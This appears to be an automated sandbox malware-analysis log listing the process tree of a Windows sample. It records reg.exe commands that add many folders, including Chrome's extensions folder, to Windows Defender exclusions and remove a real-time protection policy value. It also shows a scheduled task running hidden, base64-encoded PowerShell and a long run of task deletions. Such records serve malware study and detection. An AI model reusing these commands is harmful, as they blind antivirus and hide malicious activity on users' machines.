- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\dkHlCbgnIThowMMU\BJMBtNcw\zjtYbNKrCOnFnEdF.wsf"2⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\dkHlCbgnIThowMMU\BJMBtNcw\zjtYbNKrCOnFnEdF.wsf"2⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LjPBjCkxU" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LjPBjCkxU" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WEPOREuymMJJC" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WEPOREuymMJJC" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yyjtaGBLEqUn" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yyjtaGBLEqUn" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PtxASTBQXXYOENVB" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PtxASTBQXXYOENVB" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EkAcBLsehYBU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LjPBjCkxU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LjPBjCkxU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WEPOREuymMJJC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WEPOREuymMJJC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yyjtaGBLEqUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yyjtaGBLEqUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PtxASTBQXXYOENVB" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PtxASTBQXXYOENVB" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dkHlCbgnIThowMMU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gimIjQLhT" /SC once /ST 02:20:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gimIjQLhT"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gimIjQLhT"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iYllYzWOsJAFFfwAw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iYllYzWOsJAFFfwAw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "iYllYzWOsJAFFfwAw2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "iYllYzWOsJAFFfwAw2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fPtQZVBGyPdaKQTOv"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fPtQZVBGyPdaKQTOv"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "fPtQZVBGyPdaKQTOv2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fPtQZVBGyPdaKQTOv2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BCnLzkyOLZmLmIzwE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BCnLzkyOLZmLmIzwE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "BCnLzkyOLZmLmIzwE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BCnLzkyOLZmLmIzwE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "KuLOMfOQwGIIxjPQo"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KuLOMfOQwGIIxjPQo"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "KuLOMfOQwGIIxjPQo2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KuLOMfOQwGIIxjPQo2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "QpHLEFsCJKnqdWiFQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QpHLEFsCJKnqdWiFQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "QpHLEFsCJKnqdWiFQ2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QpHLEFsCJKnqdWiFQ2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JjLlOQoXGuQPCUatX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JjLlOQoXGuQPCUatX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JjLlOQoXGuQPCUatX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JjLlOQoXGuQPCUatX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ahBPwJtarfivgyQCX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ahBPwJtarfivgyQCX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ahBPwJtarfivgyQCX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ahBPwJtarfivgyQCX2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dSEsiSMbbyMjmgUXi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dSEsiSMbbyMjmgUXi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "dSEsiSMbbyMjmgUXi2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dSEsiSMbbyMjmgUXi2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "lxqfHZMYglidBLlwk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lxqfHZMYglidBLlwk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "lxqfHZMYglidBLlwk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lxqfHZMYglidBLlwk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "GgtgzPiQnzQTXdKHD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GgtgzPiQnzQTXdKHD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "GgtgzPiQnzQTXdKHD2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GgtgzPiQnzQTXdKHD2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "hSKXczqQgUSiKyBIq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hSKXczqQgUSiKyBIq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "hSKXczqQgUSiKyBIq2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hSKXczqQgUSiKyBIq2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "USQKnjDrryqfkhdiY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "USQKnjDrryqfkhdiY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "USQKnjDrryqfkhdiY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "USQKnjDrryqfkhdiY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "yUsQetiTYqwFtrFXE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yUsQetiTYqwFtrFXE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "yUsQetiTYqwFtrFXE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yUsQetiTYqwFtrFXE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oNisdINIjIDgGJWJp"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oNisdINIjIDgGJWJp"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oNisdINIjIDgGJWJp2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oNisdINIjIDgGJWJp2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FflikJmsVSrpAnzdm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FflikJmsVSrpAnzdm"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FflikJmsVSrpAnzdm2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FflikJmsVSrpAnzdm2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bhrRzeLjFMONelYUe"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhrRzeLjFMONelYUe"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "bhrRzeLjFMONelYUe2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhrRzeLjFMONelYUe2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zFCxEKyYfHZqHRxXg"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zFCxEKyYfHZqHRxXg"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zFCxEKyYfHZqHRxXg2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zFCxEKyYfHZqHRxXg2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "tRrjoTQcDsRkclAsy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tRrjoTQcDsRkclAsy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "tRrjoTQcDsRkclAsy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tRrjoTQcDsRkclAsy2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zoWzbtLxqmMmTAlSq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zoWzbtLxqmMmTAlSq"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zoWzbtLxqmMmTAlSq2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zoWzbtLxqmMmTAlSq2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DRTidHIeKPheRAMyM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DRTidHIeKPheRAMyM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DRTidHIeKPheRAMyM2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DRTidHIeKPheRAMyM2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FbVloGRvRXpHpvUoC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FbVloGRvRXpHpvUoC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FbVloGRvRXpHpvUoC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FbVloGRvRXpHpvUoC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DmubMkhxcDoElzROBpi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DmubMkhxcDoElzROBpi"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DmubMkhxcDoElzROBpi2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DmubMkhxcDoElzROBpi2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gTSPEAyXWRBkgECtlmW"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTSPEAyXWRBkgECtlmW"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gTSPEAyXWRBkgECtlmW2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTSPEAyXWRBkgECtlmW2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DgPohQYoFstDEAukEvE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DgPohQYoFstDEAukEvE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DgPohQYoFstDEAukEvE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DgPohQYoFstDEAukEvE2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pUflfRSniGOrkEioyUk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pUflfRSniGOrkEioyUk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pUflfRSniGOrkEioyUk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pUflfRSniGOrkEioyUk2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "myNYhcWULdyyuqVeOLR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "myNYhcWULdyyuqVeOLR"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "myNYhcWULdyyuqVeOLR2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "myNYhcWULdyyuqVeOLR2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "lAtvBWBhjAuAUSkhaQr"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lAtvBWBhjAuAUSkhaQr"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "lAtvBWBhjAuAUSkhaQr2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lAtvBWBhjAuAUSkhaQr2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JknGisNDLGEJSyipVcP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JknGisNDLGEJSyipVcP"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JknGisNDLGEJSyipVcP2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JknGisNDLGEJSyipVcP2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YymCzRAEFuptGYVgYyY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YymCzRAEFuptGYVgYyY"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YymCzRAEFuptGYVgYyY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YymCzRAEFuptGYVgYyY2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "axFcpconfnvMPcfoPBw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "axFcpconfnvMPcfoPBw"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "axFcpconfnvMPcfoPBw2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "axFcpconfnvMPcfoPBw2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "TbObhCfvGhvWYtTlxMQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TbObhCfvGhvWYtTlxMQ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "TbObhCfvGhvWYtTlxMQ2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TbObhCfvGhvWYtTlxMQ2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pmOjfgpJgprtFswRBIC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pmOjfgpJgprtFswRBIC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "pmOjfgpJgprtFswRBIC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pmOjfgpJgprtFswRBIC2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JtXAmmmjhUPKgDhgNcr"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JtXAmmmjhUPKgDhgNcr"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JtXAmmmjhUPKgDhgNcr2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JtXAmmmjhUPKgDhgNcr2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "nBvEvDWPBldxaKpKfqN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nBvEvDWPBldxaKpKfqN"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "nBvEvDWPBldxaKpKfqN2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nBvEvDWPBldxaKpKfqN2"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "jzhFTGrHTBEHdwhDlHk"2⤵
-
